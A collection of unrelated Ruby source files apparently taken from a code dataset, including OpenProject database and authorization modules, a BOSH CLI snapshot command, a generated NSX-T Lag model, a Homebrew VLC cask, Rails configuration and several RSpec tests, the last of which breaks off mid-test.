scenario 'admin copies level into the same course' do
sign_in_user school_admin.user, referrer: curriculum_school_course_path(course)
find('button[title="Edit selected chapter"').click
click_button 'Actions'
find("div[data-submission-id=\"#{course.name}\"]").click
accept_confirm do
click_button 'Copy Chapter'
end
expect(page).to have_content('Chapter copy requested. It will apppear in target course soon!')
visit curriculum_school_course_path(course)
expect(all('option').last.text).to eq("Chapter 3: #{level_2.name}")
end
scenario 'admin copies level into another course' do
sign_in_user school_admin.user, referrer: curriculum_school_course_path(course)
find('button[title="Edit selected chapter"').click
click_button 'Actions'
find("div[data-submission-id=\"#{course_2.name}\"]").click
accept_confirm do
click_button 'Copy Chapter'
end
expect(page).to have_content('Chapter copy requested. It will apppear in target course soon!')
visit curriculum_school_course_path(course_2)
expect(all('option').last.text).to eq("Chapter 1: #{level_2.name}")
end
end
end
| 38.858974 | 142 | 0.728225 |
3327d014f0cc474467b4607bc61edca257049dcc | 6,051 | #-- encoding: UTF-8
#-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'semantic'
module OpenProject
# This module provides some information about the currently used database
# adapter. It can be used to write code specific to certain database
  # vendors which, while not encouraged, is sometimes necessary due to
# syntax differences.
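  #
  # A hypothetical usage sketch (all methods are defined below):
  #
  #   OpenProject::Database.check!        # raises unless a supported PostgreSQL version
  #   OpenProject::Database.name          # => :postgresql for a postgres adapter
  #   OpenProject::Database.postgresql?   # => true when connected to PostgreSQL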
module Database
DB_VALUE_FALSE = 'f'.freeze
DB_VALUE_TRUE = 't'.freeze
class InsufficientVersionError < StandardError; end
class UnsupportedDatabaseError < StandardError; end
# This method returns a hash which maps the identifier of the supported
# adapter to a regex matching the adapter_name.
def self.supported_adapters
@adapters ||= begin
{
postgresql: /postgres/i
}
end
end
##
# Get the database system requirements
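    # (numeric follows PG_VERSION_NUM: 9.5.0 => 9 * 10000 + 5 * 100 + 0 = 90500)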
def self.required_version
{
numeric: 90500, # PG_VERSION_NUM
string: '9.5.0'
}
end
##
# Check pending database migrations
# and cache the result for up to one hour
def self.migrations_pending?(ensure_fresh: false)
cache_key = OpenProject::Cache::CacheKey.key('database_migrations')
cached_result = Rails.cache.read(cache_key)
      # Recompute whenever a fresh check is forced, or the cached value is
      # anything other than a definite false (i.e., positive or unset)
      if ensure_fresh || cached_result != false
        fresh_result = connection.migration_context.needs_migration?
        Rails.cache.write(cache_key, fresh_result, expires_in: 1.hour)
return fresh_result
end
false
end
##
# Check the database for
# * being postgresql
# * version compatibility
#
    # Raises an +UnsupportedDatabaseError+ when the database is not PostgreSQL
    # Raises an +InsufficientVersionError+ when the version is incompatible
def self.check!
if !postgresql?
message = "Database server is not PostgreSql. " \
"As OpenProject uses non standard ANSI-SQL for performance optimizations, using a different DBMS will " \
"break and is thus prevented."
if adapter_name.match?(/mysql/i)
message << " As MySql used to be supported, there is a migration script to ease the transition " \
"(https://www.openproject.org/deprecating-mysql-support/)."
end
raise UnsupportedDatabaseError.new message
elsif !version_matches?
current = version
message = "Database server version mismatch: Required version is #{required_version[:string]}, " \
"but current version is #{current}"
raise InsufficientVersionError.new message
end
end
##
# Return +true+ if the required version is matched by the current connection.
def self.version_matches?
numeric_version >= required_version[:numeric]
end
# Get the raw name of the currently used database adapter.
# This string is set by the used adapter gem.
def self.adapter_name(connection = self.connection)
connection.adapter_name
end
# Get the AR base connection object handle
# will open a db connection implicitly
def self.connection
ActiveRecord::Base.connection
end
# returns the identifier of the specified connection
# (defaults to ActiveRecord::Base.connection)
def self.name(connection = self.connection)
supported_adapters.find(proc { [:unknown, //] }) do |_adapter, regex|
adapter_name(connection) =~ regex
end[0]
end
# Provide helper methods to quickly check the database type
# OpenProject::Database.postgresql? returns true, if we have a postgresql DB
# Also allows specification of a connection e.g.
# OpenProject::Database.postgresql?(my_connection)
supported_adapters.keys.each do |adapter|
(class << self; self; end).class_eval do
define_method(:"#{adapter.to_s}?") do |connection = self.connection|
send(:name, connection) == adapter
end
end
end
def self.mysql?(_arg = nil)
message = ".mysql? is no longer supported and will always return false. Remove the call."
ActiveSupport::Deprecation.warn message, caller
false
end
# Return the version of the underlying database engine.
# Set the +raw+ argument to true to return the unmangled string
# from the database.
def self.version(raw = false)
@version ||= ActiveRecord::Base.connection.select_value('SELECT version()')
raw ? @version : @version.match(/\APostgreSQL ([\d\.]+)/i)[1]
end
def self.numeric_version
ActiveRecord::Base.connection.select_value('SHOW server_version_num;').to_i
end
# Return if the version of the underlying database engine is capable of TSVECTOR features, needed for full-text
# search.
def self.allows_tsv?
version_matches?
end
end
end
| 34.775862 | 123 | 0.69096 |
e8136039f3b206863f0cbf5ef0b32a3c1fae62fd | 2,863 | module Bosh::Cli::Command
class Snapshot < Base
usage 'snapshots'
desc 'List all snapshots'
def list(job = nil, index = nil)
auth_required
deployment_name = prepare_deployment_manifest(show_state: true).name
snapshots = director.list_snapshots(deployment_name, job, index)
if snapshots.empty?
nl
say('No snapshots')
nl
return
end
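      # Sort by job name, then uuid (or index for legacy records), then creation time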
sorted = snapshots.sort do |a, b|
s = a['job'].to_s <=> b['job'].to_s
if a['uuid']
s = a['uuid'].to_i <=> b['uuid'].to_i if s == 0
else
s = a['index'].to_i <=> b['index'].to_i if s == 0
end
s = a['created_at'].to_s <=> b['created_at'].to_s if s == 0
s
end
snapshots_table = table do |t|
t.headings = ['Job/ID', 'Snapshot CID', 'Created at', 'Clean']
sorted.each do |snapshot|
job = "#{snapshot['job'] || 'unknown'}/#{snapshot['uuid'] || 'unknown'} (#{snapshot['index'] || 'unknown'})"
t << [job, snapshot['snapshot_cid'], snapshot['created_at'], snapshot['clean']]
end
end
nl
say(snapshots_table)
nl
say('Snapshots total: %d' % snapshots.size)
end
usage 'take snapshot'
desc 'Takes a snapshot'
def take(job = nil, index = nil)
auth_required
deployment_name = prepare_deployment_manifest(show_state: true).name
unless job && index
unless confirmed?("Are you sure you want to take a snapshot of all deployment `#{deployment_name}'?")
say('Canceled taking snapshot'.make_green)
return
end
end
status, task_id = director.take_snapshot(deployment_name, job, index)
task_report(status, task_id, 'Snapshot taken')
end
usage 'delete snapshot'
desc 'Deletes a snapshot'
def delete(snapshot_cid)
auth_required
deployment_name = prepare_deployment_manifest(show_state: true).name
unless confirmed?("Are you sure you want to delete snapshot `#{snapshot_cid}'?")
say('Canceled deleting snapshot'.make_green)
return
end
status, task_id = director.delete_snapshot(deployment_name, snapshot_cid)
task_report(status, task_id, "Deleted Snapshot `#{snapshot_cid}'")
end
usage 'delete snapshots'
desc 'Deletes all snapshots of a deployment'
def delete_all
auth_required
deployment_name = prepare_deployment_manifest(show_state: true).name
unless confirmed?("Are you sure you want to delete all snapshots of deployment `#{deployment_name}'?")
say('Canceled deleting snapshots'.make_green)
return
end
status, task_id = director.delete_all_snapshots(deployment_name)
task_report(status, task_id, "Deleted all snapshots of deployment `#{deployment_name}'")
end
end
end
| 28.919192 | 118 | 0.623472 |
189eaa4e1dcf8af996a4801c9b4a9fcf7d68dc77 | 1,812 | #-- encoding: UTF-8
#-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
class Authorization::UserRolesQuery < Authorization::AbstractUserQuery
self.model = Role
self.base_table = users_table
def self.query(*args)
arel = transformed_query(*args)
model.where(roles_table[:id].in(arel))
end
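  # Illustrative shape of the generated SQL (simplified):
  #   SELECT * FROM roles WHERE roles.id IN (
  #     SELECT roles.id FROM users LEFT OUTER JOIN roles ON roles.id = member_roles.role_id ...)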
transformations.register :all, :roles_join do |statement|
statement.outer_join(roles_table)
.on(roles_member_roles_join)
end
transformations.register :all, :project do |statement|
statement.project(roles_table[:id])
end
def self.roles_member_roles_join
roles_table[:id].eq(member_roles_table[:role_id])
end
end
| 34.188679 | 91 | 0.752759 |
01e437f3e997c04f4a6caf7bcb7f713764e6cc4d | 298 | # frozen_string_literal: true
class Course::LessonPlan::Milestone < ActiveRecord::Base
belongs_to :course, inverse_of: :lesson_plan_milestones
def initialize_duplicate(duplicator, other)
self.start_at += duplicator.time_shift
self.course = duplicator.duplicate(other.course)
end
end
| 29.8 | 57 | 0.788591 |
21f8ec2e45552eeeaf43293c38a33028a1a6c43b | 85 | # desc "Explaining what the task does"
# task :matanza2 do
# # Task goes here
# end | 21.25 | 38 | 0.682353 |
edf603fc0acaeff85a1c04b5fb0ea259a477a194 | 3,585 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "new_sample_app_#{Rails.env}"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end
| 41.206897 | 102 | 0.759554 |
bf149191c794aadd42aa8d251867703c511e100c | 11,180 | =begin
#NSX-T Manager API
#VMware NSX-T Manager REST API
OpenAPI spec version: 2.3.0.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.3.1
=end
require 'date'
module NSXT
# LACP group
class Lag
# uplink names
attr_accessor :uplinks
# Lag name
attr_accessor :name
# number of uplinks
attr_accessor :number_of_uplinks
# LACP timeout type
attr_accessor :timeout_type
# LACP load balance Algorithm
attr_accessor :load_balance_algorithm
# unique id
attr_accessor :id
# LACP group mode
attr_accessor :mode
class EnumAttributeValidator
attr_reader :datatype
attr_reader :allowable_values
def initialize(datatype, allowable_values)
@allowable_values = allowable_values.map do |value|
case datatype.to_s
when /Integer/i
value.to_i
when /Float/i
value.to_f
else
value
end
end
end
def valid?(value)
!value || allowable_values.include?(value)
end
end
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'uplinks' => :'uplinks',
:'name' => :'name',
:'number_of_uplinks' => :'number_of_uplinks',
:'timeout_type' => :'timeout_type',
:'load_balance_algorithm' => :'load_balance_algorithm',
:'id' => :'id',
:'mode' => :'mode'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'uplinks' => :'Array<Uplink>',
:'name' => :'String',
:'number_of_uplinks' => :'Integer',
:'timeout_type' => :'String',
:'load_balance_algorithm' => :'String',
:'id' => :'String',
:'mode' => :'String'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v}
if attributes.has_key?(:'uplinks')
if (value = attributes[:'uplinks']).is_a?(Array)
self.uplinks = value
end
end
if attributes.has_key?(:'name')
self.name = attributes[:'name']
end
if attributes.has_key?(:'number_of_uplinks')
self.number_of_uplinks = attributes[:'number_of_uplinks']
end
if attributes.has_key?(:'timeout_type')
self.timeout_type = attributes[:'timeout_type']
else
self.timeout_type = "SLOW"
end
if attributes.has_key?(:'load_balance_algorithm')
self.load_balance_algorithm = attributes[:'load_balance_algorithm']
end
if attributes.has_key?(:'id')
self.id = attributes[:'id']
end
if attributes.has_key?(:'mode')
self.mode = attributes[:'mode']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @name.nil?
invalid_properties.push("invalid value for 'name', name cannot be nil.")
end
if @number_of_uplinks.nil?
invalid_properties.push("invalid value for 'number_of_uplinks', number_of_uplinks cannot be nil.")
end
if @number_of_uplinks > 32
invalid_properties.push("invalid value for 'number_of_uplinks', must be smaller than or equal to 32.")
end
if @number_of_uplinks < 2
invalid_properties.push("invalid value for 'number_of_uplinks', must be greater than or equal to 2.")
end
if @load_balance_algorithm.nil?
invalid_properties.push("invalid value for 'load_balance_algorithm', load_balance_algorithm cannot be nil.")
end
if @mode.nil?
invalid_properties.push("invalid value for 'mode', mode cannot be nil.")
end
return invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @name.nil?
return false if @number_of_uplinks.nil?
return false if @number_of_uplinks > 32
return false if @number_of_uplinks < 2
timeout_type_validator = EnumAttributeValidator.new('String', ["SLOW", "FAST"])
return false unless timeout_type_validator.valid?(@timeout_type)
return false if @load_balance_algorithm.nil?
load_balance_algorithm_validator = EnumAttributeValidator.new('String', ["SRCMAC", "DESTMAC", "SRCDESTMAC", "SRCDESTIPVLAN", "SRCDESTMACIPPORT"])
return false unless load_balance_algorithm_validator.valid?(@load_balance_algorithm)
return false if @mode.nil?
mode_validator = EnumAttributeValidator.new('String', ["ACTIVE", "PASSIVE"])
return false unless mode_validator.valid?(@mode)
return true
end
# Custom attribute writer method with validation
# @param [Object] number_of_uplinks Value to be assigned
def number_of_uplinks=(number_of_uplinks)
if number_of_uplinks.nil?
fail ArgumentError, "number_of_uplinks cannot be nil"
end
if number_of_uplinks > 32
fail ArgumentError, "invalid value for 'number_of_uplinks', must be smaller than or equal to 32."
end
if number_of_uplinks < 2
fail ArgumentError, "invalid value for 'number_of_uplinks', must be greater than or equal to 2."
end
@number_of_uplinks = number_of_uplinks
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] timeout_type Object to be assigned
def timeout_type=(timeout_type)
validator = EnumAttributeValidator.new('String', ["SLOW", "FAST"])
unless validator.valid?(timeout_type)
fail ArgumentError, "invalid value for 'timeout_type', must be one of #{validator.allowable_values}."
end
@timeout_type = timeout_type
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] load_balance_algorithm Object to be assigned
def load_balance_algorithm=(load_balance_algorithm)
validator = EnumAttributeValidator.new('String', ["SRCMAC", "DESTMAC", "SRCDESTMAC", "SRCDESTIPVLAN", "SRCDESTMACIPPORT"])
unless validator.valid?(load_balance_algorithm)
fail ArgumentError, "invalid value for 'load_balance_algorithm', must be one of #{validator.allowable_values}."
end
@load_balance_algorithm = load_balance_algorithm
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] mode Object to be assigned
def mode=(mode)
validator = EnumAttributeValidator.new('String', ["ACTIVE", "PASSIVE"])
unless validator.valid?(mode)
fail ArgumentError, "invalid value for 'mode', must be one of #{validator.allowable_values}."
end
@mode = mode
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
uplinks == o.uplinks &&
name == o.name &&
number_of_uplinks == o.number_of_uplinks &&
timeout_type == o.timeout_type &&
load_balance_algorithm == o.load_balance_algorithm &&
id == o.id &&
mode == o.mode
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[uplinks, name, number_of_uplinks, timeout_type, load_balance_algorithm, id, mode].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
          # check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
        end # else the key was not in the attributes hash; fine, since the attribute may be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NSXT.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map{ |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 31.142061 | 151 | 0.636404 |
4a152d0c08de37aecbe8084aa46cf88ae96e99ff | 270 | require 'spec_helper'
describe '::cassandra::params' do
let :facts do
{
osfamily: 'RedHat',
operatingsystemmajrelease: 7
}
end
it do
should compile
should contain_class('cassandra::params')
should have_resource_count(0)
end
end
| 15.882353 | 45 | 0.662963 |
ed5c60d3666154e6634fe3fc89bb3944988712aa | 169 | # Set up the load path.
lib = File.expand_path(File.dirname(__FILE__))
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "wax/version"
require "wax/main"
| 24.142857 | 55 | 0.757396 |
f8507669bcc0c91200667255f07f8bfe94706634 | 3,282 |
module Nucleon
module Util
class Cache < Core
@@cache_lock = Mutex.new
#-----------------------------------------------------------------------------
# This class already inherits much of what we need from the core config class.
# Right now we just have to worry about persistence
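      # Example (hypothetical root path and id):
      #   cache = Nucleon::Util::Cache.new('/tmp/project', :build)
      #   cache.set(:last_run, Time.now.to_s)  # persisted to /tmp/project/.cache/build.<translator>
      #   cache.get(:last_run)                 # falls back to a disk reload on a miss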
#-----------------------------------------------------------------------------
# Constructor / Destructor
def initialize(root_path, id, cache_dir = '.cache', force = true)
super({}, {}, force)
@cache_dir = cache_dir
@cache_root = File.join(root_path, cache_dir)
FileUtils.mkdir_p(base_path) unless File.directory?(base_path)
@cache_id = id.to_sym
@cache_translator = Nucleon.type_default(:nucleon, :translator)
@cache_filename = "#{id}.#{translator}"
@cache_path = File.join(@cache_root, @cache_filename)
load
end
#-----------------------------------------------------------------------------
# Property accessors / modifiers
def status
@status
end
#---
def base_path
@cache_root
end
#---
def directory_name
@cache_dir
end
#---
def id
@cache_id
end
#---
def translator
@cache_translator
end
#---
def file
@cache_path
end
#---
def get(keys, default = nil, format = false)
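        # On a miss, reload from disk once in case another process persisted new data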
result = super(keys, nil)
if result.nil?
load
result = super(keys, nil)
end
result = filter(default, format) if result.nil?
result
end
#---
def set(keys, value, delete_nil = false)
result = super
save if initialized?
result
end
#---
def delete(keys, default = nil)
result = super
save if initialized?
result
end
#---
def clear
result = super
save if initialized?
result
end
#-----------------------------------------------------------------------------
# Operations
def import_base(properties, options = {})
config = Config.ensure(options)
result = super
save if initialized? && ! config.get(:no_save, false)
result
end
#---
def load
success = false
@status = 255
@@cache_lock.synchronize do
logger.info("Loading #{translator} translated cache from #{file}")
parser = CORL.translator({}, translator)
raw = Disk.read(file)
if parser && raw && ! raw.empty?
logger.debug("Cache file contents: #{raw}")
parse_properties = Data.hash(parser.parse(raw))
Nucleon.remove_plugin(parser)
import(parse_properties, { :no_save => true }) unless parse_properties.empty?
success = true
@status = Nucleon.code.success
end
end
success
end
protected :load
#---
def save
success = false
@status = 255
@@cache_lock.synchronize do
if renderer = CORL.translator({}, translator)
rendering = renderer.generate(export)
Nucleon.remove_plugin(renderer)
if Disk.write(file, rendering)
success = true
@status = Nucleon.code.success
end
end
end
success
end
protected :save
end
end
end
| 19.652695 | 85 | 0.519805 |
5d6819506e085250d525e250b15efac7e0b3aab1 | 1,361 | cask 'vlc' do
version '2.2.4'
sha256 'fd071b9817c9efccac5a144d69893a4a5323cbde4a74d5691c3cf3ab979d4160'
url "https://get.videolan.org/vlc/#{version}/macosx/vlc-#{version}.dmg"
appcast 'http://update.videolan.org/vlc/sparkle/vlc-intel64.xml',
checkpoint: '0e71dfa9874979a8a9e6a9a3a7fdd21366a92082bce2836cbd938186ad5945fa'
name 'VLC media player'
homepage 'https://www.videolan.org/vlc/'
license :oss
gpg "#{url}.asc",
key_id: '65f7c6b4206bd057a7eb73787180713be58d1adc'
app 'VLC.app'
# shim script (https://github.com/caskroom/homebrew-cask/issues/18809)
shimscript = "#{staged_path}/vlcwrapper"
binary shimscript, target: 'vlc'
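  # The preflight below generates that wrapper: a two-line shell script that
  # runs the app bundle's VLC binary with any arguments passed to `vlc`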
preflight do
File.open(shimscript, 'w') do |f|
f.puts '#!/bin/bash'
f.puts "#{appdir}/VLC.app/Contents/MacOS/VLC \"$@\""
FileUtils.chmod '+x', f
end
end
zap delete: [
'~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/org.videolan.vlc.sfl',
'~/Library/Application Support/org.videolan.vlc',
'~/Library/Preferences/org.videolan.vlc',
'~/Library/Preferences/org.videolan.vlc.plist',
'~/Library/Saved Application State/org.videolan.vlc.savedState',
'~/Library/Caches/org.videolan.vlc',
]
end
| 37.805556 | 148 | 0.669361 |
91de0f13bab678baf08ddeb5f59f0c3528a45a3c | 278 | require 'sidekiq/web'
Rails.application.routes.draw do
resources :txns
root to: 'pages#home'
resources :banks
resources :users
mount Sidekiq::Web => '/sidekiq'
# For details on the DSL available within this file, see https://guides.rubyonrails.org/routing.html
end
| 25.272727 | 102 | 0.741007 |
5d468ff7867482bf7dff860e5a5be9fb77f5428d | 804 | require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
describe ZPNG::Metadata do
# itxt.png contains all possible text chunks
describe "itxt.png" do
let!(:metadata){
ZPNG::Image.load( File.join(SAMPLES_DIR, "itxt.png") ).metadata
}
it "should get all values" do
metadata.size.should == 4
end
it "should not find not existing value" do
metadata['foobar'].should be_nil
end
it "should find all existing values" do
metadata['Title'].should == "PNG"
metadata['Author'].should == "La plume de ma tante"
metadata['Warning'].should == "Es is verboten, um diese Datei in das GIF-Bildformat\numzuwandeln. Sie sind gevarnt worden."
metadata['Description'].should =~ /Since POV-Ray does not direclty support/
end
end
end
| 34.956522 | 130 | 0.674129 |
798ebfa4507445e6efb0b4a41169f191b79a7352 | 646 | class DeviseInvitable::RegistrationsController < Devise::RegistrationsController
protected
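  # If the submitted email belongs to a user who was invited but never signed up,
  # reuse that record and accept the invitation instead of building a new user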
def build_resource(hash = nil)
hash ||= resource_params || {}
if hash[:email]
self.resource = resource_class.where(:email => hash[:email]).first
if self.resource && self.resource.respond_to?(:invited_to_sign_up?) && self.resource.invited_to_sign_up?
self.resource.attributes = hash
self.resource.send_confirmation_instructions if self.resource.confirmation_required_for_invited?
self.resource.accept_invitation
else
self.resource = nil
end
end
self.resource ||= super
end
end
| 34 | 110 | 0.713622 |
91d18e548cb848941b9831bbdaa7807acf0b75ca | 998 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `rails
# db:schema:load`. When creating a new database, `rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2021_03_26_154008) do
create_table "tweets", force: :cascade do |t|
t.string "content"
t.integer "user_id"
end
create_table "users", force: :cascade do |t|
t.string "username"
t.string "email"
t.string "password_digest"
end
end
| 36.962963 | 86 | 0.759519 |
39f8940978007a000dc682ee9f7f5518a28756a5 | 592 | require 'byebug'
post '/friendships' do
current_user.friendships.create(:friend_id => params[:friend_id])
redirect '/'
end
post '/destroyfriendships' do
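  # A friendship row may have been created from either side, so look up whichever
  # direction exists before destroying it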
  if current_user.friends.where(id: params[:friend_id]).empty?
    friendship_to_be_destroyed = Friendship.where(friend_id: params[:current_user_id], user_id: params[:friend_id]).first
    Friendship.destroy(friendship_to_be_destroyed.id)
  else
    friendship_to_be_destroyed = Friendship.where(user_id: params[:current_user_id], friend_id: params[:friend_id]).first
Friendship.destroy(friendship_to_be_destroyed.id)
end
redirect '/'
end | 25.73913 | 118 | 0.785473 |
abe3b5d1e579661c2cd0f80d1dfa8829843f149f | 143 | class AddPictureToIrbSelections < ActiveRecord::Migration
def change
add_attachment :irb_selections_pictures, :picture
end
end
| 23.833333 | 57 | 0.769231 |
f8db957df80e887054b4b2f24fd38a9700cb3eaf | 2,733 | describe UseCase::UpdateAssessmentStatus do
include RSpecRegisterApiServiceMixin
scheme_id = nil
subject(:use_case) do
described_class.new(
assessments_gateway: assessments_gateway,
assessments_search_gateway: assessments_search_gateway,
assessors_gateway: Gateway::AssessorsGateway.new,
event_broadcaster: Events::Broadcaster.new,
)
end
let(:assessments_gateway) { Gateway::AssessmentsGateway.new }
let(:assessments_search_gateway) { Gateway::AssessmentsSearchGateway.new }
let(:assessment) do
assessments_search_gateway.search_by_assessment_id(
"0000-0000-0000-0000-0000",
restrictive: false,
).first
end
let(:linked_assessment) do
assessments_search_gateway.search_by_assessment_id(
"0000-0000-0000-0000-0001",
restrictive: false,
).first
end
before(:all) do
scheme_id = add_scheme_and_get_id
add_super_assessor(scheme_id: scheme_id)
cepc_schema = "CEPC-8.0.0".freeze
cepc_xml = Nokogiri.XML Samples.xml(cepc_schema, "cepc+rr")
call_lodge_assessment(scheme_id: scheme_id, schema_name: cepc_schema, xml_document: cepc_xml)
end
context "when calling update_statuses" do
before do
use_case.execute("0000-0000-0000-0000-0000", "CANCELLED", [scheme_id])
end
it "cancels the first assessment" do
expect(assessment.get("cancelled_at")).not_to be_nil
end
